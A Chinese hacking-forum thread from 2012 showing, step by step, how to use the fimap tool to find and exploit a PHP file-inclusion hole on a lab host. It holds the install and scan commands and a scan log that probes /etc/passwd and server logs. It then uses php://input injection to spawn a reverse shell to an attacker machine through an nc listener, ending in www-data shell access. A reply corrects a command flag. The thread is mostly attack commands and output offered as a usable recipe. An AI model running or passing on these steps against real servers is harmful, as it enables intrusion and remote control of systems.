切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
239 PHP文件包含漏洞 2 fimap[复制链接]
发表于 2012-8-26 20:58:13 | 显示全部楼层 |!read_mode!
安装
  1. root@Dis9Team:/pen/web# svn checkout http://fimap.googlecode.com/svn/trunk/ fimap
复制代码
扫描一下:
  1. root@Dis9Team:/pen/web# cd fimap/src/
  2. root@Dis9Team:/pen/web/fimap/src# ./fimap.py -u "http://5.5.5.3/lif.php?file=info.php" --enable-blind
  3. fimap v.1.00_svn (Uitmuntende programmatuur alleen voor jij!)
  4. :: Automatic LFI/RFI scanner and exploiter
  5. :: by Iman Karim (fimap.dev@gmail.com)

  6. Blind FI-error checking enabled.
  7. SingleScan is testing URL: 'http://5.5.5.3/lif.php?file=info.php'
  8. [07:07:59] [OUT] Inspecting URL 'http://5.5.5.3/lif.php?file=info.php'...
  9. [07:07:59] [INFO] Fiddling around with URL...
  10. [07:07:59] [INFO] Sniper failed. Going blind...
  11. [07:07:59] [OUT] Possible file inclusion found blindly! -> 'http://5.5.5.3/lif.php?file=/etc/passwd' with Parameter 'file'.
  12. [07:07:59] [OUT] Identifying Vulnerability 'http://5.5.5.3/lif.php?file=info.php' with Parameter 'file' blindly...
  13. [07:07:59] [WARN] Unknown language - Autodetecting...
  14. [07:07:59] [INFO] Autodetect thinks this could be a PHP-Script...
  15. [07:07:59] [INFO] If you think this is wrong start fimap with --no-auto-detect
  16. [07:07:59] [INFO] Testing file '/etc/passwd'...
  17. [07:07:59] [INFO] Testing file '/proc/self/environ'...
  18. [07:07:59] [INFO] Testing file 'php://input'...
  19. [07:07:59] [INFO] Testing file '/var/log/apache2/access.log'...
  20. [07:07:59] [INFO] Testing file '/var/log/apache/access.log'...
  21. [07:07:59] [INFO] Testing file '/var/log/httpd/access.log'...
  22. [07:07:59] [INFO] Testing file '/var/log/apache2/access_log'...
  23. [07:07:59] [INFO] Testing file '/var/log/apache/access_log'...
  24. [07:07:59] [INFO] Testing file '/var/log/httpd/access_log'...
  25. [07:07:59] [INFO] Testing file '/apache/logs/access.log'...
  26. [07:07:59] [INFO] Testing file '/apache/logs/access_log'...
  27. [07:07:59] [INFO] Testing file '/apache2/logs/access.log'...
  28. [07:07:59] [INFO] Testing file '/apache2/logs/access_log'...
  29. [07:07:59] [INFO] Testing file '/etc/httpd/logs/access_log'...
  30. [07:07:59] [INFO] Testing file '/etc/httpd/logs/access.log'...
  31. [07:07:59] [INFO] Testing file '/var/httpd/logs/access_log'...
  32. [07:07:59] [INFO] Testing file '/var/httpd/logs/access.log'...
  33. [07:07:59] [INFO] Testing file '/var/www/logs/access_log'...
  34. [07:07:59] [INFO] Testing file '/var/www/logs/access.log'...
  35. [07:07:59] [INFO] Testing file '/usr/local/apache/logs/access_log'...
  36. [07:07:59] [INFO] Testing file '/usr/local/apache/logs/access.log'...
  37. [07:07:59] [INFO] Testing file '/usr/local/apache2/logs/access_log'...
  38. [07:07:59] [INFO] Testing file '/usr/local/apache2/logs/access.log'...
  39. [07:07:59] [INFO] Testing file '/var/log/access_log'...
  40. [07:07:59] [INFO] Testing file '/var/log/access.log'...
  41. [07:07:59] [INFO] Testing file '/logs/access.log'...
  42. [07:07:59] [INFO] Testing file '/logs/access_log'...
  43. [07:07:59] [INFO] Testing file '/opt/lampp/logs/access_log'...
  44. [07:07:59] [INFO] Testing file '/opt/lampp/logs/access.log'...
  45. [07:07:59] [INFO] Testing file '/opt/xampp/logs/access.log'...
  46. [07:07:59] [INFO] Testing file '/opt/xampp/logs/access_log'...
  47. [07:07:59] [INFO] Testing file '/var/log/auth.log'...
  48. [07:07:59] [INFO] Testing file '/var/log/secure'...
  49. [07:07:59] [INFO] Testing file 'http://www.phpbb.de/index.php'...
  50. ##########################################################
  51. #[1] Possible PHP-File Inclusion                         #
  52. ##########################################################
  53. #::REQUEST                                               #
  54. #  [URL]        http://5.5.5.3/lif.php?file=info.php     #
  55. #  [HEAD SENT]                                           #
  56. #::VULN INFO                                             #
  57. #  [GET PARAM]  file                                     #
  58. #  [PATH]       Not received (Blindmode)                 #
  59. #  [OS]         Unix                                     #
  60. #  [TYPE]       Blindly Identified                       #
  61. #  [TRUNCATION] Not tested.                              #
  62. #  [READABLE FILES]                                      #
  63. #                   [0] /etc/passwd                      #
  64. #                   [1] php://input                      #
  65. #                   [2] http://www.phpbb.de/index.php    #
  66. ##########################################################
  67. root@Dis9Team:/pen/web/fimap/src#
复制代码
漏洞利用
  1. root@Dis9Team:/pen/web/fimap/src# ./fimap.py -x
  2. fimap v.1.00_svn (Uitmuntende programmatuur alleen voor jij!)
  3. :: Automatic LFI/RFI scanner and exploiter
  4. :: by Iman Karim (fimap.dev@gmail.com)

  5. ###############################################
  6. #:: List of Domains ::                        #
  7. ###############################################
  8. #[1] 5.5.5.3 (Linux 2.6.35-22-generic-pae)    #
  9. #[q] Quit                                     #
  10. ###############################################
  11. WARNING: Some domains may be not listed here because dynamic_rfi is not configured!
  12. Choose Domain:
复制代码

选择主机 选择 1

选择地址

  1. Choose Domain: 1
  2. #############################################################################################
  3. #:: FI Bugs on '5.5.5.3' ::                                                                 #
  4. #############################################################################################
  5. #[1] URL: '/lif.php?file=info.php' injecting file: 'php://input' using GET-param: 'file'    #
  6. #[q] Quit                                                                                   #
  7. #############################################################################################
  8. WARNING: Some bugs are suppressed because dynamic_rfi is not configured!
  9. Choose vulnerable script:
复制代码
选择1
  1. Choose vulnerable script: 1
  2. [07:13:08] [INFO] Testing PHP-code injection thru POST...
  3. [07:13:08] [OUT] PHP Injection works! Testing if execution works...
  4. [07:13:08] [INFO] Testing execution thru 'popen[b64]'...
  5. [07:13:08] [OUT] Execution thru 'popen[b64]' works!
  6. ####################################################
  7. #:: Available Attacks - PHP and SHELL access ::    #
  8. ####################################################
  9. #[1] Spawn fimap shell                             #
  10. #[2] Spawn pentestmonkey's reverse shell           #
  11. #[3] [Test Plugin] Show some info                  #
  12. #[q] Quit                                          #
  13. ####################################################
  14. Choose Attack:
复制代码
后门方式 第一个是正向SHELL 第二个是反向SHELL 选择2
先监听:

  1. root@Dis9Team:/pen/web/fimap/src# nc -v -l 1234
复制代码
输入配置
  1. Choose Attack: 2
  2. IP Address to connect back to: 5.5.5.2
  3. The Port it should connect back: 1234
  4. Make your netcat server ready and hit enter...
复制代码
获得SHELL
  1. root@Dis9Team:/pen/web/fimap/src# nc -v -l 1234
  2. Connection from 5.5.5.3 port 1234 [tcp/*] accepted
  3. Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
  4. 15:14:12 up  1:15,  2 users,  load average: 0.00, 0.00, 0.00
  5. USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
  6. root     tty1                      13:59    1:14m  0.15s  0.10s -bash
  7. root     pts/0    5.5.5.2          14:00   17:53   0.34s  0.34s -bash
  8. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  9. /bin/sh: can't access tty; job control turned off
  10. $ id
复制代码










第一个正向SHELL同理
  1. ####################################################
  2. #:: Available Attacks - PHP and SHELL access ::    #
  3. ####################################################
  4. #[1] Spawn fimap shell                             #
  5. #[2] Spawn pentestmonkey's reverse shell           #
  6. #[3] [Test Plugin] Show some info                  #
  7. #[q] Quit                                          #
  8. ####################################################
  9. Choose Attack: 1
  10. Please wait - Setting up shell (one request)...
  11. -------------------------------------------
  12. Welcome to fimap shell!
  13. Better don't start interactive commands! ;)
  14. Also remember that this is not a persistent shell.
  15. Every command opens a new shell and quits it after that!
  16. Enter 'q' to exit the shell.
  17. -------------------------------------------
  18. fishell@www-data:/var/www[        DISCUZ_CODE_16        ]gt; pwd
  19. /var/www
  20. fishell@www-data:/var/www[        DISCUZ_CODE_16        ]gt;
复制代码









操千曲而后晓声,观千剑而后识器。
发表于 2012-9-9 01:50:39 | 显示全部楼层
注意
  1. root@Dis9Team:/pen/web# svn checkout http://fimap.googlecode.com/svn/trunk/ fimap
复制代码
fimap前面是有空格的否则提示找不到文件
  1. ./fimap.py -x
复制代码
实际为
  1. ./fimap.py -X
复制代码



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-23 15:24

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部